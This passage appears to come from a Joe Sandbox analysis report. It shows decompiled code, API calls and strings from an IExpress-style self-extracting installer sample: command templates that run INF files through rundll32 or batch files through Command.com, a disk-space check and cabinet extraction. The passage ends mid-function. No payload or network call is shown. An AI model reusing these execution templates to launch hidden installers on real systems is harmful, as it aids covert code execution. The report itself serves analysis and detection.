Instruction ID: b480aef6182ad06adcbbeb4f272c010d50cf7057693b4bf715caabf90b7e55d3
Opcode Fuzzy Hash: 928cf7b6f95a11dc972728bd81f5b48d93bd954df1c3ed4750cad3a80a83f905
Instruction Fuzzy Hash: 1CB1DE70A08311DFF720DF288845B6B76E4FB87754F10092AFA95D6D90EB74CA44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 008A1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E008A1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E008A1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E008A1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E008A1781( &_v268, 0x104, _t111, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
					E008A658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E008A1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E008A66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E008A66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E008A1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E008A1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E008A16B3( &_v1552, 0x400, " ");
										E008A16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E008A2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E008A171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E008A1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E008A1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E008A44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x8a9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x8a1140, _t156, 8,  &_v268) == 0) {
										 *0x8a9a34 =  *0x8a9a34 & 0xfffffffb;
										if( *0x8a9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E008A171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x8a9a34 =  *0x8a9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E008A1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E008A1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E008A6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x008a1af3
0x008a1afa
0x008a1b07
0x008a1b09
0x008a1b1a
0x008a1b20
0x008a1b2c
0x008a1b3b
0x008a1b40
0x008a1b2e
0x008a1b2e
0x008a1b33
0x008a1b33
0x008a1b46
0x008a1b4c
0x008a1b52
0x008a1b57
0x008a1b5d
0x008a1b61
0x008a1b9f
0x008a1b9f
0x008a1bb1
0x008a1bc2
0x00000000
0x008a1b63
0x008a1b63
0x008a1b65
0x008a1b68
0x008a1b68
0x008a1b6a
0x008a1b6b
0x008a1b6f
0x008a1b74
0x00000000
0x00000000
0x008a1b76
0x008a1b7b
0x008a1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x008a1b8c
0x008a1b8c
0x008a1b98
0x008a1bc7
0x008a1bc9
0x008a1bcc
0x008a1bd3
0x008a1d75
0x008a1d76
0x008a1d78
0x008a1d7f
0x008a1e05
0x008a1e09
0x00000000
0x00000000
0x008a1e12
0x008a1e1b
0x008a1e73
0x008a1e21
0x008a1e21
0x008a1e28
0x008a1e37
0x008a1e3e
0x008a1e52
0x008a1e60
0x008a1e60
0x008a1e3e
0x008a1e79
0x008a1e7b
0x008a1e84
0x00000000
0x008a1d9b
0x008a1d9b
0x008a1da0
0x008a1da2
0x008a1da5
0x008a1da5
0x008a1da7
0x008a1da8
0x008a1dac
0x008a1dae
0x008a1db4
0x008a1db7
0x008a1db7
0x008a1db9
0x008a1dba
0x008a1dbe
0x008a1dc3
0x008a1dce
0x008a1dd2
0x008a1deb
0x00000000
0x008a1df0
0x00000000
0x008a1dd2
0x008a1bf7
0x008a1bfe
0x008a1c07
0x008a1d55
0x008a1d5a
0x008a1d5b
0x008a1d5d
0x008a1d5e
0x00000000
0x008a1c1b
0x008a1c1b
0x008a1c20
0x008a1c2c
0x008a1c33
0x008a1c38
0x008a1c3a
0x008a1c3a
0x008a1c40
0x008a1c4b
0x008a1c4b
0x008a1c5d
0x008a1c61
0x008a1dd4
0x008a1dd4
0x008a1dd6
0x008a1ddb
0x008a1ddc
0x008a1dde
0x008a1d64
0x008a1d64
0x008a1d67
0x008a1d6c
0x00000000
0x008a1c67
0x008a1c67
0x008a1c6d
0x008a1c72
0x008a1c74
0x008a1c74
0x008a1c8e
0x008a1c99
0x008a1cc0
0x008a1cf8
0x008a1d07
0x008a1d23
0x008a1d09
0x008a1d14
0x008a1d1b
0x008a1d1b
0x008a1d2b
0x008a1d2d
0x008a1d2d
0x008a1d38
0x008a1d39
0x008a1d46
0x008a1cc2
0x008a1cc2
0x008a1ccc
0x008a1cce
0x008a1cce
0x008a1cdb
0x008a1ce6
0x008a1cee
0x008a1cee
0x008a1e89
0x008a1e91
0x008a1e92
0x008a1e94
0x008a1e97
0x008a1ea4
0x008a1ea4
0x008a1c61
0x008a1c07
0x008a1bd3
0x008a1b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008A1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008A1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008A1C57
GetPrivateProfileIntA.KERNEL32 ref: 008A1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,008A1140,00000000,00000008,?), ref: 008A1CB8
GetShortPathNameA.KERNEL32 ref: 008A1D1B

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A1BA0
.BAT, xrefs: 008A1D83
Command.com /c %s, xrefs: 008A1D9B, 008A1DE8
AdvancedINF, xrefs: 008A1CAE
setupx.dll, xrefs: 008A1D14
DefaultInstall, xrefs: 008A1C74, 008A1C87, 008A1CCE, 008A1CD3, 008A1D2D, 008A1D39
Reboot, xrefs: 008A1C82
.INF, xrefs: 008A1BDB
Version, xrefs: 008A1CB3
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 008A1D3B
setupapi.dll, xrefs: 008A1D23, 008A1D3A
", xrefs: 008A1B25

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-3060569371
Opcode ID: eaa927560d83bdcf8036ed381a8d40713fc4b48af220868f86b0de2508f9b75c
Instruction ID: fc92682515fc080e976e1272d19a5d4c64822708f7cdac98c211581d24d9b363
Opcode Fuzzy Hash: eaa927560d83bdcf8036ed381a8d40713fc4b48af220868f86b0de2508f9b75c
Instruction Fuzzy Hash: 1EA14C70A042186BFF209B28CC4CBEA7769FB57310F140295E595E3ED1EBB49E86CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008A597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E008A597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x8a9124 = E008A6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E008A44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x8a9a34 & 0x00000008;
							if(( *0x8a9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x8a9a38; // 0x0
								_t110 =  *((intOrPtr*)(0x8a89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x8a9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E008A268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x8a9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x8a89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x8a89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x8a9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E008A44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x8a9124 = E008A6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E008A44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x8a9124 = E008A6285();
					_t66 = 0;
					L33:
					return E008A6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x008a597d
0x008a5988
0x008a598f
0x008a599a
0x008a59a6
0x008a59a8
0x008a59af
0x008a59b9
0x008a59dd
0x008a59e4
0x008a59f1
0x008a59fe
0x008a5a0b
0x008a5a13
0x008a5a19
0x008a5a1b
0x008a5ba1
0x008a5baf
0x008a5bbd
0x008a5bd8
0x008a5bde
0x008a5be3
0x008a5bec
0x008a5bf0
0x008a5bfc
0x008a5c02
0x008a5c02
0x008a5c02
0x008a5c04
0x008a5c04
0x00000000
0x008a5c04
0x008a5a27
0x008a5a3a
0x008a5a46
0x008a5a48
0x008a5a4a
0x00000000
0x00000000
0x008a5a64
0x008a5a6a
0x008a5a6c
0x008a5abc
0x008a5ac2
0x008a5ac9
0x008a5aca
0x008a5aca
0x008a5acc
0x008a5acc
0x008a5acf
0x008a5ad1
0x00000000
0x00000000
0x008a5ad3
0x008a5ad6
0x008a5ad8
0x00000000
0x00000000
0x008a5ada
0x008a5adc
0x008a5add
0x008a5add
0x008a5ae0
0x00000000
0x00000000
0x00000000
0x008a5ae0
0x008a5ae2
0x008a5ae4
0x008a5ae6
0x008a5ae6
0x008a5ae6
0x008a5ae9
0x008a5aeb
0x008a5af0
0x008a5af6
0x008a5af8
0x008a5af9
0x008a5af9
0x008a5afb
0x00000000
0x00000000
0x008a5afd
0x008a5aff
0x008a5b00
0x008a5b03
0x00000000
0x00000000
0x00000000
0x008a5b03
0x008a5b05
0x008a5b08
0x008a5b20
0x008a5b27
0x008a5b52
0x008a5b52
0x008a5b5b
0x008a5b62
0x008a5b6b
0x008a5b6d
0x008a5b76
0x008a5b7d
0x008a5b83
0x008a5b7f
0x008a5b7f
0x008a5b7f
0x008a5b6f
0x008a5b72
0x008a5b72
0x008a5b85
0x008a5b98
0x008a5b9e
0x008a5b87
0x008a5b8f
0x008a5b8f
0x00000000
0x008a5b85
0x008a5b29
0x008a5b33
0x00000000
0x00000000
0x008a5b35
0x008a5b48
0x008a5b4a
0x00000000
0x008a5b4a
0x008a5b0f
0x008a5b16
0x00000000
0x008a5b16
0x008a5a7c
0x008a5a8a
0x008a5aa5
0x008a5aab
0x00000000
0x008a59bb
0x008a59c0
0x008a59c7
0x008a59d1
0x008a59d6
0x008a5c05
0x008a5c14
0x008a5c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008A59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 008A59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 008A5A13
MulDiv.KERNEL32(?,?,00000400), ref: 008A5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 008A5A64
memset.MSVCRT ref: 008A5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008A5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 008A5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 008A5BFC

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Part of subcall function 008A6285: GetLastError.KERNEL32(008A5BBC), ref: 008A6285

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: afc04aab6f6b1a00e03aafa77ee95b6dfb4096307c8bab7c6d0cf474e28661a7
Instruction ID: 84e7c1dd86e3f27a51bd387b24453797f4f4f86bea979ac17e23f82bab518e51
Opcode Fuzzy Hash: afc04aab6f6b1a00e03aafa77ee95b6dfb4096307c8bab7c6d0cf474e28661a7
Instruction Fuzzy Hash: 857190B1A0061CABFB159F64CC85BFB77ACFB4A314F0440A9F546D6940EB749E85CB21

Uniqueness

Uniqueness Score: -1.00%

Function 008A4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E008A4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x8a9144 = E008A468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x8a9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x8a8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x8a8584, 0x841), 5); // executed
				}
				_t10 = E008A4EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E008A4CA0, E008A4CC0, E008A4980, E008A4A50, E008A4AD0, E008A4B60, E008A4BC0, 1, 0x8a9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x8a9148; // 0x0
						_t24 =  *0x8a8584; // 0x0
						E008A44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x8a1140, 0, E008A4CD0, 0, 0x8a9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x8a8584; // 0x0
					E008A44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x8a9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x8a9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x8a91d8; // 0x0
						if(_t47 == 0) {
							E008A44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x8a8a38 & 0x00000001) == 0 && ( *0x8a9a34 & 0x00000001) == 0) {
						SendMessageA( *0x8a8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x008a4fe0
0x008a4fe6
0x008a4ff9
0x008a500d
0x008a5013
0x008a501a
0x008a5163
0x008a5163
0x008a5020
0x008a5027
0x008a5037
0x008a5051
0x008a5051
0x008a5057
0x008a505e
0x008a50a7
0x008a50ad
0x008a50b4
0x008a50e8
0x008a50e8
0x008a50ee
0x008a50ff
0x008a5104
0x008a5106
0x00000000
0x008a5106
0x008a50cd
0x008a50d3
0x008a50da
0x00000000
0x00000000
0x008a50dd
0x008a50e6
0x00000000
0x00000000
0x00000000
0x008a5060
0x008a5060
0x008a5070
0x008a5075
0x008a5107
0x008a5107
0x008a510e
0x008a5111
0x008a5117
0x008a5117
0x008a511f
0x008a5121
0x008a5127
0x008a5135
0x008a5135
0x008a5127
0x008a5141
0x008a5159
0x008a5159
0x00000000
0x008a515f

APIs

Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46A0
Part of subcall function 008A468F: SizeofResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46A9
Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46C3
Part of subcall function 008A468F: LoadResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46CC
Part of subcall function 008A468F: LockResource.KERNEL32(00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46D3
Part of subcall function 008A468F: memcpy_s.MSVCRT ref: 008A46E5
Part of subcall function 008A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 008A4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 008A5006
LockResource.KERNEL32(00000000), ref: 008A500D
GetDlgItem.USER32(00000000,00000842), ref: 008A5030
ShowWindow.USER32(00000000), ref: 008A5037
GetDlgItem.USER32(00000841,00000005), ref: 008A504A
ShowWindow.USER32(00000000), ref: 008A5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 008A5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 008A5159

Strings

*MEMCAB, xrefs: 008A50C7
CABINET, xrefs: 008A4FE6, 008A4FF7

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 739cec0e88836b9d4cb7975b67368a2a5a8508dc75307222ab5123067b811a93
Instruction ID: accd65746e0c73c54f574f7c5bf6cbb00f48f0de5c9fa09ef23a289bfde89c8f
Opcode Fuzzy Hash: 739cec0e88836b9d4cb7975b67368a2a5a8508dc75307222ab5123067b811a93
Instruction Fuzzy Hash: 3831C0B0740602BBFB205B65AD89F773A9CF78BB55F041024F916E2EA1DBBD8C40C661

Uniqueness

Uniqueness Score: -1.00%

Function 008A2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E008A2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t9 ^ _t46;
				if( *0x8a8a38 != 0) {
					L5:
					_t11 = E008A5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E008A6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E008A55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E008A658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x8aa288("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x8a8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x8a8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x8a8d48 & 0x000000c0;
									if(( *0x8a8d48 & 0x000000c0) == 0) {
